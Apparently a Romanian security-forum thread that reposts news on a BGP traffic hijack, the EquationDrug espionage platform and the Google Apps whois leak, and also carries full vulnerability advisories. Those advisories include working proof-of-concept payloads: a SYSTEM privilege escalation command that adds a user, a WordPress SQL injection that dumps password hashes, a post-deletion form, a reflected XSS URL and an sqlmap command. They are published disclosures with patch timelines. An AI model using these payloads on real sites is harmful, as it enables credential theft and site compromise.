(GB) 162.62.136.0/22 Adaptec, Inc. (GB) 193.28.232.0/24 TEVA UK HOLDINGS LIMITED (GB) 193.238.232.0/24 Pinewood Technologies Plc (GB) 194.36.55.0/24 Hogg Robinson PLC (GB) 196.4.50.0/24 Uniserv Group (GB) 194.33.160.0/24 Office of Communications (GB) 161.163.177.0/24 Wal-Mart Stores, Inc. (GB) 194.130.197.0/24 MAID PLC (GB) 192.65.44.0/24 Tektronix, Inc. (GB) 192.189.160.0/24 Lafarge Tarmac Holdings Limited (GB) 132.153.252.0/24 Atomic Weapons Establishment (GB) 193.195.138.0/24 Telme Online Limited (GB) 193.33.244.0/24 AAH Pharmaceuticals Ltd (GB) 132.153.251.0/24 Atomic Weapons Establishment (GB) 198.200.211.0/24 Curtis Instruments, Inc. (GB) 193.46.76.0/24 Shire Pharmaceuticals Limited (GB) 144.98.0.0/16 RWE NPower (GB) 84.23.0.0/19 Biznet IIS Ltd. (GB) 158.234.0.0/16 CGI IT UK Ltd. (GB) 193.35.197.0/24 British Telecommunications PLC (GB) 194.60.136.0/24 Cornwall Council (GB) 146.174.170.0/23 Quantum Corporation (GB) 167.26.157.0/24 CIBC World Markets (GB) 109.205.158.0/24 BONTBLOCK (GB) 5.81.0.0/16 BT Infrastructure Layer (GB) 162.10.0.0/19 Doculynx Inc. (GB) 158.155.253.0/24 Computer Generation (GB) 165.197.56.0/22 Pepsi-Cola International (GB) 193.37.142.0/24 CSC IT Ltd (GB) 148.252.3.0/24 Department for Environment, Food and Rural Affairs (DEFRA) (GB) 193.113.0.0/16 British Telecommunications PLC (GB) 194.36.248.0/24 WWRD United Kingdom Ltd (GB) 193.37.160.0/24 BT Public Internet Service (GB) 91.198.255.0/24 Sandwell Metropolitan Borough Council (GB) 192.65.227.0/24 British Telecommunications PLC (GB) 5.53.64.0/19 SAS Global Communications Ltd. (GB) 132.153.244.0/24 Atomic Weapons Establishment (GB) 170.136.115.0/24 Viad Corp (GB) 194.59.188.0/24 WCMC 2000 (GB) 194.132.25.0/24 WSP Europe (GB) 195.99.0.0/16 BT Public Internet Service (GB) 192.152.14.0/24 Aircraft Research Association Limited (GB) 159.10.208.0/22 CNA Insurance (GB) 199.181.156.0/24 ARC - Chicago (GB) 132.153.246.0/24 Atomic Weapons Establishment (GB) 192.65.224.0/24 British Telecommunications PLC (GB) 94.72.248.0/21 KCOM BT sub-allocation (GB) 193.238.233.0/24 Pinewood Technologies Plc (GB) 193.219.122.0/24 Significant (UK) Ltd (GB) 80.247.56.0/23 PGDS UK ONE - BT Internet - PG1 DC (GB) 192.65.228.0/24 British Telecommunications PLC (GB) 192.65.226.0/24 British Telecommunications PLC (GB) 194.169.32.0/24 AgustaWestland Ltd (GB) 204.124.211.0/24 Fruit of the Loom, Inc. (GB) 194.169.32.0/20 AgustaWestland Ltd (GB) 148.253.4.0/22 Department for Environment, Food and Rural Affairs (DEFRA) (GB) 194.132.24.0/24 WSP Europe (GB) 194.169.22.0/24 Isoft Health Ltd (GB) 132.153.247.0/24 Atomic Weapons Establishment (GB) 194.34.174.0/24 Allianz Insurance plc (GB) 161.163.166.0/24 Wal-Mart Stores, Inc. (GB) 195.8.202.0/23 Significant (UK) Ltd (GB) 192.31.31.0/24 British Telecommunications PLC (GB) 192.28.124.0/24 Lockheed Martin Corporation (GB) 212.140.0.0/16 BT Public Internet Service (GB) 193.195.7.0/24 Thus PLC t/a Demon Internet (GB) 192.19.199.0/24 Avago Technologies U.S. Inc. (GB) 91.233.33.0/24 Metropolitan Networks UK Ltd (GB) 192.65.222.0/24 British Telecommunications PLC (GB) 159.180.96.0/19 BT-CENTRAL-PLUS (GB) 165.120.0.0/16 BT Public Internet Service (GB) 155.202.124.0/22 SANTANDER UK PLC (GB) 150.147.68.0/24 Data Research Associates, Inc. (GB) 132.146.0.0/16 British Telecommunications PLC (GB) 109.144.0.0/12 BT Public Internet Service (GB) 159.253.66.0/23 KCOM Group Public Limited Company (GB) 142.205.161.0/24 Toronto Dominion Bank (GB) 62.7.0.0/16 BT Public Internet Service (GB) 62.239.0.0/16 British Telecommunications PLC (GB) 194.36.128.0/24 Hitachi Europe Ltd (GB) 194.32.3.0/24 Northern Ireland Civil Service (GB) 170.136.116.0/24 Viad Corp (GB) 217.32.0.0/12 BT Public Internet Service (GB) 192.65.219.0/24 British Telecommunications PLC (GB) 194.169.33.0/24 AgustaWestland Ltd (GB) 213.1.0.0/16 BT Public Internet Service (GB) 62.6.0.0/16 BT Public Internet Service (GB) 5.80.0.0/15 BT Public Internet Service (GB) 195.244.16.0/24 Websense SC Operations Limited (GB) 91.227.78.0/24 Ashridge (Bonar Law Memorial) Trust (GB) 194.169.36.0/24 AgustaWestland Ltd (GB) 193.131.115.0/24 Eurodollar (UK) Limited (GB) 192.65.223.0/24 British Telecommunications PLC (GB) 212.70.68.0/23 Intuitiv Ltd. (GB) 194.169.79.0/24 BUILDING DESIGN PARTNERSHIP LIMITED (GB) 132.153.250.0/24 Atomic Weapons Establishment (GB) 80.247.0.0/20 Net Energy Internet Ltd. (GB) 195.35.123.0/24 Toshiba Information Systems (UK) Ltd (GB) 194.130.196.0/24 MAID PLC (GB) 194.34.211.0/24 The Statistics Board (GB) 85.235.107.0/24 DMZ at Bacton. (GB) 146.198.0.0/16 INFONET Services Corporation (GB) 82.132.188.0/22 O2 Reference (UK) (GB) 194.72.0.0/14 BT Public Internet Service (GB) 213.249.188.0/22 KCOM Group Public Limited Company (GB) 194.34.210.0/24 The Statistics Board (GB) 194.34.205.0/24 The Statistics Board (GB) 192.65.225.0/24 British Telecommunications PLC (GB) 132.153.245.0/24 Atomic Weapons Establishment (GB) 132.153.253.0/24 Atomic Weapons Establishment (GB) 132.153.249.0/24 Atomic Weapons Establishment (GB) 162.116.126.0/24 Allergan, Inc. (GB) 91.247.73.0/24 Unipath Limited (GB) 145.229.0.0/16 Northern Ireland Civil Service (GB) 192.65.221.0/24 British Telecommunications PLC (GB) 149.223.0.0/16 TRW Automotive (GB) 194.169.35.0/24 AgustaWestland Ltd (GB) 167.26.158.0/24 CIBC World Markets (GB) 159.197.13.0/24 NATS (GB) 62.172.0.0/16 BT Public Internet Service (GB) 212.162.230.0/24 Royal Bank of Scotland plc (GB) 216.222.222.0/24 Smith and Nephew - Endoscopy (GB) 193.102.37.0/24 Softlab GmbH, Muenchen (GB) 194.102.0.0/19 British Telecommunications PLC (GB) 193.32.39.0/24 Sir Robert McAlpine Ltd (GB) 192.156.169.0/24 Syntellect Inc. (GB) 171.30.128.0/17 Global Crossing VHSDR service (GB) 132.153.248.0/24 Atomic Weapons Establishment (GB) 194.34.209.0/24 The Statistics Board (GB) 193.36.253.0/24 Allen and Overy LLP (GB) 195.95.131.0/24 NCC Services Ltd (GB) 152.134.0.0/16 SIX CONTINENTS LIMITED (GB) 61.28.219.0/24 Servcorp (GB) 194.34.223.0/24 Allianz Insurance plc (GB) 167.26.159.0/24 CIBC World Markets (GB) 193.39.141.0/24 AWE PLC (GB) A chart provided by Dyn showed that about a quarter of the Internet's large providers observed the roundabout path advised for Royal Mail Group, Limited, one of 14 groups with hijacked traffic that started Saturday. Well under 10 percent of large Internet providers observed the circuitous route Vega advised for the Atomic Weapons Establishment during the much shorter 90-minute window that diversion lasted. It's not clear if a similarly small portion of providers recognized the path advertised for the other 166 BT customers affected. Still, the diversion is significant given the number and stature of those customers. Source

Kaspersky malware probers have uncovered a new 'operating system'-like platform that was developed and used by the National Security Agency (NSA) in its Equation spying arsenal. The EquationDrug or Equestre platform is used to deploy 116 modules to target computers that can siphon data and spy on victims. "It's important to note that EquationDrug is not just a trojan, but a full espionage platform, which includes a framework for conducting cyberespionage activities by deploying specific modules on the machines of selected victims," Kaspersky researchers say in a report. "Other threat actors known to use such sophisticated platforms include Regin and Epic Turla. "The architecture of the whole framework resembles a mini-operating system with kernel-mode and user-mode components carefully interacting with each other via a custom message-passing interface." The platform is part of the NSA's possibly ongoing campaign to infect hard disk firmware. It replaces the older EquationLaser and is itself superseded by the GrayFish platform. Kaspersky says the newly-identified wares are as "sophisticated as a space station" thanks to the sheer number of included espionage tools. Extra modules can be added through a custom encrypted file system containing dozens of executables that together baffle most security bods. Most of the unique identifiers and codenames tied to modules is encrypted and obfuscated. Some modules capabilities can be determined with unique identification numbers. Others are dependent on other plugins to function. Each plugin has a unique ID and version number that defines a set of functions it can provide. Some of the plugins depend on others and might not work unless dependencies are resolved. Kaspersky bods have found 30 of the 116 modules estimated to exist. "The plugins we discovered probably represent just a fraction of the attackers' potential," the researchers say. Executable timestamps reveal NSA developers likely work hardest on the platform on Tuesdays to Fridays, perhaps having late starts to Monday. Modules detected in the tool include code for: Network traffic interception for stealing or re-routing Reverse DNS resolution (DNS PTR records) Computer management Start/stop processes Load drivers and libraries Manage files and directories System information gathering OS version detection Computer name detection User name detection Locale detection Keyboard layout detection Timezone detection Process list Browsing network resources and enumerating and accessing shares WMI information gathering Collection of cached passwords Enumeration of processes and other system objects Monitoring LIVE user activity in web browsers Low-level NTFS filesystem access based on the popular Sleuthkit framework Monitoring removable storage drives Passive network backdoor (runs Equation shellcode from raw traffic) HDD and SSD firmware manipulation Keylogging and clipboard monitoring Browser history, cached passwords and form auto-fill data collection. Source

Google leaked the complete hidden whois data attached to more than 282,000 domains registered through the company's Google Apps for Work service, a breach that could bite good and bad guys alike. The 282,867 domains counted by Cisco Systems' researchers account for 94 percent of the addresses Google Apps has registered through a partnership with registrar eNom. Among the services is one that charges an additional $6 per year to shield from public view all personal information included in domain name whois records. Rather than being published publicly, the information is promised to remain in the hands of eNom except when it receives a court order to turn it over. Starting in mid 2013, a software defect in Google Apps started leaking the data, including names, phone numbers, physical addresses, e-mail addresses, and more. The bug caused the data to become public once a domain registration was renewed. Cisco's Talos Security Intelligence and Research Group discovered it on February 19, and five days later the leak was plugged, slightly shy of two years after it first sprung. Whois data is notoriously unreliable, as is clear from all the obviously fake names, addresses, and other data that's contained in public whois records. Still, it's reasonable to assume that some people might be more forthcoming when using a supposedly privacy-enhancing service Google claimed hid such data. Even in cases where people falsified records, the records still might provide important clues about the identities of the people who made them. Often when data isn't pseudo-randomized, it follows patterns that can link the creator to a particular group or other Internet record. As Cisco researchers Nick Biasini, Alex Chiu, Jaeson Schultz, Craig Williams, and William McVey wrote: Google began warning Google Apps customers of the breach on Thursday night. An official e-mail reads: It's not particularly easy for the uninitiated to get bulk access to the 282,000 whois exposed records, especially now that two weeks have passed since the data has once again been hidden. Registrars make it difficult to download mass numbers of records, but as the Cisco researchers point out, the falsified data is now a permanent part of the Internet record that won't be hard for determined people to find. It wouldn't be surprising if now-hidden records begin selling in the black market soon. Google's breathtaking failure is a potent reminder why in most cases people do well to provide false information when registering for anything online. In some cases, accurate information is required. More often than not, things work fine with fields left blank or filled in with random characters. It's hard to know just how many people will be bitten by this epic blunder, but even if it's only 10 percent of those affected, that's a hell of a price. Update: A Google spokesman said the bug resided in the way Google Apps integrated with eNom's domain registration program interface. It was reported through Google's Vulnerability Rewards Program. The spokesman said the root cause has been identified and fixed. Source

Mogwai Security Advisory MSA-2015-03 ---------------------------------------------------------------------- Title: iPass Mobile Client service local privilege escalation Product: iPass Mobile Client Affected versions: iPass Mobile Client 2.4.2.15122 (Newer version might be also affected) Impact: medium Remote: no Product link: http://www.ipass.com/laptops/ Reported: 11/03/2015 by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench) Vendor's Description of the Software: ---------------------------------------------------------------------- The iPass Open Mobile client for laptops is lightweight and always on. It provides easy, seamless connectivity across iPass, customer, and third-party networks, and allows you to mix and match carrier networks without disrupting your users. The iPass Open Mobile client for laptops allows organizations to provide granular options for how employees connect to iPass Wi-Fi (the iPass Mobile Network), campus Wi-Fi, mobile broadband (3G/4G), Ethernet, and dial, using a single platform to manage all connections. Open Mobile also enables cost and security controls that provide virtual private network (VPN) integration options; mobile broadband 3G/4G usage controls for both data roaming and data usage; endpoint integrity verification that checks the security of the device at the point of connection; and several additional options for setting network connection and restriction policies. Insight into an organizations mobility usage is provided through user and device activity and summary reports as well as mobile broadband usage reports. ----------------------------------------------------------------------- Vendor response: ----------------------------------------------------------------------- "We do not consider this a vulnerability as it is how the product was designed" Business recommendation: ----------------------------------------------------------------------- Disable the iPass service unless really required -- CVSS2 Ratings ------------------------------------------------------ CVSS Base Score: 5.6 Impact Subscore: 7.8 Exploitability Subscore: 3.9 CVSS v2 Vector (AV:L/AC:L/Au:N/C:P/I:C/A:N) ----------------------------------------------------------------------- Vulnerability description: ---------------------------------------------------------------------- The iPass Open Mobile Windows Client utilizes named pipes for interprocess communication. One of these pipes accepts/forwards commands to the iPass plugin subsystem. A normal user can communicate with this pipe through the command line client EPCmd.exe which is part of the iPass suite. A list of available commands can be displayed via "System.ListAllCommands". The iPass pipe provides a "iPass.EventsAction.LaunchAppSysMode" command which allows to execute arbitrary commands as SYSTEM. This can be abused by a normal user to escalate his local privileges. Please note that this issue can also be exploited remotely in version 2.4.2.15122 as the named pipe can also be called via SMB. However according to our information, the pipe is no longer remotely accessible in current versions of the iPass Mobile client. Proof of concept: ---------------------------------------------------------------------- The following EPCmd command line creates a local user "mogwai" with password "mogwai": EPCmd.exe iPass.EventsAction.LaunchAppSysMode c:\windows\system32\cmd.exe;"/c net user mogwai mogwai /ADD;; Disclosure timeline: ---------------------------------------------------------------------- 10/03/2015: Requesting security contact from iPass sales 10/03/2015: Sales responded, will forward vulnerability information to the development 11/03/2015: Sending vulnerability details 11/03/2015: iPass asks which customer we represent 11/03/2015: Responding that we don't represent any iPass customer 12/03/2015: iPass responded, wont fix, says that the product works as designed Advisory URL: ---------------------------------------------------------------------- https://www.mogwaisecurity.de/#lab ---------------------------------------------------------------------- Mogwai, IT-Sicherheitsberatung Muench Steinhoevelstrasse 2/2 89075 Ulm (Germany) info@mogwaisecurity.de Source

OVERVIEW ========== WPML is the industry standard for creating multi-lingual WordPress sites. Three vulnerabilities were found in the plug-in. The most serious of them, an SQL injection problem, allows anyone to read the contents of the WordPress database, including user details and password hashes, without authentication. System administrators should update to version 3.1.9.1 released earlier this week to resolve the issues. DETAILS ======== 1. SQL injection When WPML processed a HTTP POST request containing the parameter ”action=wp-link-ajax”, the current language is determined by parsing the HTTP referer. The parsed language code is not checked for validity, nor SQL-escaped. The user doesn’t need to be logged in. By sending a carefully crafted referer value with the mentioned POST request parameter, an attacker can perform SQL queries on arbitrary tables and retrieve their results. In addition to the standard WordPress database and tables, the attacker may query all other databases and tables accessible to the web backend. The following HTML snippet demonstrates the vulnerability: <script> var union="select user_login,1,user_email,2,3,4,5,6,user_pass,7,8,9,10,11,12 from wp_users"; if (document.location.search.length < 2) document.location.search="lang=xx' UNION "+union+" -- -- "; </script> <form method=POST action="https://YOUR.WORDPRESS.BLOG/comments/feed"> <input type=hidden name=action value="wp-link-ajax"> <input type=submit> </form> The results of the SQL query will be shown in the comments feed XML-formatted. 2. Page/post/menu deletion WPML contains a ”menu sync” function which helps site administrators to keep WordPress menus consistent across different languages. This functionality lacked any access control, allowing anyone to delete practically all content of the website - posts, pages, and menus. Example: <form method=POST action="https://YOUR.WORDPRESS.BLOG/?page=sitepress-multilingual-cms/menu/menus-sync.php"> <input type=hidden name="action" value="icl_msync_confirm"> <input type=text name="sync" size=50 value="del[x][y][12345]=z"> <input type=submit> </form> Submitting the above form would delete the row with the ID 12345 in the wp_posts database. Several items be deleted with the same request. 3. Reflected XSS The ”reminder popup” code intended for administrators in WPML didn’t check for login status or nonce. An attacker can direct target users to an URL like: https://YOUR.WORDPRESS.BLOG/?icl_action=reminder_popup&target=javascript%3Aalert%28%2Fhello+world%2f%29%3b%2f%2f to execute JavaScript in their browser. This example bypasses the Chrome XSS Auditor. In the case of WordPress, XSS triggered by an administrator can lead to server-side compromise via the plugin and theme editors. CREDITS ======== The vulnerabilities were found by Jouko Pynnonen of Klikki Oy while researching WordPress plugins falling in the scope of the Facebook bug bounty program. The vendor was notified on March 02, 2015 and the patch was released on March 10. Vendor advisory: http://wpml.org/2015/03/wpml-security-update-bug-and-fix/ An up-to-date version of this document can be found on our website http://klikki.fi . -- Jouko Pynnönen <jouko@iki.fi> Klikki Oy - http://klikki.fi Source

Title: WordPress SEO by Yoast <= 1.7.3.3 - Blind SQL Injection Version/s Tested: 1.7.3.3 Patched Version: 1.7.4 CVSSv2 Base Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C) CVSSv2 Temporal Score: 7 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C) WPVULNDB: https://wpvulndb.com/vulnerabilities/7841 Description: WordPress SEO by Yoast is a popular WordPress plugin (wordpress-seo) used to improve the Search Engine Optimization (SEO) of WordPress sites. The latest version at the time of writing (1.7.3.3) has been found to be affected by two authenticated (admin, editor or author user) Blind SQL Injection vulnerabilities. The plugin has more than one million downloads according to WordPress. Technical Description: The authenticated Blind SQL Injection vulnerability can be found within the 'admin/class-bulk-editor-list-table.php' file. The orderby and order GET parameters are not sufficiently sanitised before being used within a SQL query. Line 529: $orderby = ! empty( $_GET['orderby'] ) ? esc_sql( sanitize_text_field( $_GET['orderby'] ) ) : 'post_title'; Line 533: order = esc_sql( strtoupper( sanitize_text_field( $_GET['order'] ) ) ); If the GET orderby parameter value is not empty it will pass its value through WordPess's own esc_sql() function. According to WordPress this function 'Prepares a string for use as an SQL query. A glorified addslashes() that works with arrays.'. However, this is not sufficient to prevent SQL Injection as can be seen from our Proof of Concept. Proof of Concept (PoC): The following GET request will cause the SQL query to execute and sleep for 10 seconds if clicked on as an authenticated admin, editor or author user. http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc Using SQLMap: python sqlmap.py -u " http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date*&order=asc" --batch --technique=B --dbms=MySQL --cookie="wordpress_9d...; wordpress_logged_in_9dee67...;" Impact: As there is no anti-CSRF protection a remote unauthenticated attacker could use this vulnerability to execute arbitrary SQL queries on the victim WordPress web site by enticing an authenticated admin, editor or author user to click on a specially crafted link or visit a page they control. One possible attack scenario would be an attacker adding their own administrative user to the target WordPress site, allowing them to compromise the entire web site. Timeline: March 10th 2015 - 15:30 GMT: Vulnerability discovered by Ryan Dewhurst (WPScan Team - Dewhurst Security). March 10th 2015 - 18:30 GMT: Technical review by FireFart (WPScan Team). March 10th 2015 - 20:00 GMT: Vendor contacted via email. March 10th 2015 - 21:25 GMT: Vendor replies, confirms issue and gave expected patch timeline. March 11th 2015 - 12:05 GMT: Vendor released version 1.7.4 which patches this issue. March 11th 2015 - 12:30 GMT: Advisory released. Source

@SirGod era vorba de florinul nu de mine. Daca ai stii limba romana cum stiu eu engleza ar fi ceva... Cat despre IT mai ai de mancat pentru ati permite sa pronunti macar acest cuvant, te rog frumos inceteaza cu offtopic-ul la posturile mele ( daca ai sa-mi spui ceva ai PM )

@bukibv e postata sursa ,,Source"

@the.fish3r de ce sa primeasca ban? On:// Salut si bine ai venit.